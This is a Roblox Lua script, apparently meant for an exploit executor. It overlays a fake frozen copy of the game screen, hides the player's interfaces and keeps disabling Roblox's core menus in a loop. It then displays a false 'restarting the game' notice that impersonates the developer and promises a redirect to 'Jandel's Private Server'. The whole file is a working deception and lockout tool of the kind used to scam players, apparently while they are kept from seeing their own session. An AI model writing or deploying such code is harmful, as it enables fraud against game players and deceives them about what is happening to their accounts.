-- This script creates a realistic "frozen screen" effect with a solid black background to fill any gaps.

local CoreGui = game:GetService("CoreGui")
local StarterGui = game:GetService("StarterGui")
local Lighting = game:GetService("Lighting")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- ===================================================================
-- STEP 1: Create the inescapable GUI container.
-- ===================================================================
local freezeGui = Instance.new("ScreenGui")
freezeGui.Name = "FreezeScreen"
freezeGui.ResetOnSpawn = false
freezeGui.IgnoreGuiInset = true
freezeGui.DisplayOrder = 2147483647

-- ===================================================================
-- STEP 2: Create the solid black background layer.
-- This will fill any holes if the screenshot has transparent parts (like the sky).
-- ===================================================================
local blackBackground = Instance.new("Frame")
blackBackground.Name = "BlackBackground"
blackBackground.BackgroundColor3 = Color3.new(0, 0, 0)
blackBackground.BorderSizePixel = 0
blackBackground.Size = UDim2.new(1, 0, 1, 0)
blackBackground.Parent = freezeGui

-- ===================================================================
-- STEP 3: Create the "screenshot" layer on top of the black background.
-- ===================================================================
local screenshotFrame = Instance.new("ViewportFrame")
screenshotFrame.Name = "Screenshot"
-- Make the frame slightly larger than the screen and center it to hide corners.
screenshotFrame.Size = UDim2.new(1.1, 0, 1.1, 0)
screenshotFrame.Position = UDim2.new(0.5, 0, 0.5, 0)
screenshotFrame.AnchorPoint = Vector2.new(0.5, 0.5)
screenshotFrame.BackgroundColor3 = Color3.new(0, 0, 0)
screenshotFrame.BorderSizePixel = 0
screenshotFrame.Ambient = Lighting.Ambient
screenshotFrame.Parent = freezeGui -- Parented to the main GUI, will appear on top of the black background.

-- Clone Lighting settings to make the screenshot look real.
for _, item in ipairs(Lighting:GetChildren()) do
    item:Clone().Parent = screenshotFrame
end

-- Create a container for the cloned world.
local worldClone = Instance.new("Model")
worldClone.Name = "WorldClone"
worldClone.Parent = screenshotFrame

-- Hide all other GUIs safely by checking their type first.
for _, gui in ipairs(LocalPlayer.PlayerGui:GetChildren()) do
    if gui:IsA("ScreenGui") and gui ~= freezeGui then
        gui.Enabled = false
    end
end

-- Clone the world piece-by-piece, ignoring problematic items.
for _, item in ipairs(workspace:GetChildren()) do
    if not item:IsA("Terrain") and not item:IsA("Camera") then
        local success, result = pcall(function() return item:Clone() end)
        if success and result then
            result.Parent = worldClone
        end
    end
end

-- Create and position the camera for the screenshot.
local viewportCamera = Instance.new("Camera")
viewportCamera.Parent = screenshotFrame
screenshotFrame.CurrentCamera = viewportCamera
viewportCamera.CFrame = workspace.CurrentCamera.CFrame
viewportCamera.FieldOfView = workspace.CurrentCamera.FieldOfView

-- ===================================================================
-- STEP 4: Create the text overlay on top of the screenshot.
-- ===================================================================
local overlayFrame = Instance.new("Frame")
overlayFrame.Name = "Overlay"
overlayFrame.Size = UDim2.new(1, 0, 1, 0)
overlayFrame.BackgroundColor3 = Color3.new(0, 0, 0)
overlayFrame.BackgroundTransparency = 0.4
overlayFrame.Visible = false
overlayFrame.Parent = freezeGui

local mainText = Instance.new("TextLabel")
mainText.Name = "MainText"
mainText.Text = "We are restarting the game!"
mainText.Font = Enum.Font.GothamBold
mainText.TextColor3 = Color3.new(1, 1, 1)
mainText.TextSize = 40
mainText.Size = UDim2.new(1, 0, 0, 50)
mainText.Position = UDim2.new(0.5, 0, 0.5, 0)
mainText.AnchorPoint = Vector2.new(0.5, 0.5)
mainText.BackgroundTransparency = 1
mainText.Parent = overlayFrame

local subText = Instance.new("TextLabel")
subText.Name = "SubText"
subText.Text = "Please wait while we redirect you to Jandel's Private Server! Admin Event!"
subText.Font = Enum.Font.Gotham
subText.TextColor3 = Color3.new(1, 1, 1)
subText.TextSize = 22
subText.Size = UDim2.new(0.9, 0, 0, 60)
subText.TextWrapped = true
subText.Position = UDim2.new(0.5, 0, 0.57, 0)
subText.AnchorPoint = Vector2.new(0.5, 0.5)
subText.BackgroundTransparency = 1
subText.Parent = overlayFrame

-- ===================================================================
-- STEP 5: Activate everything.
-- ===================================================================
freezeGui.Parent = CoreGui

task.spawn(function()
    while task.wait(0.1) do
        pcall(function()
            StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, false)
        end)
    end
end)

task.wait(0.5)
overlayFrame.Visible = true

print("Layered freeze screen activated. This should be perfect.")
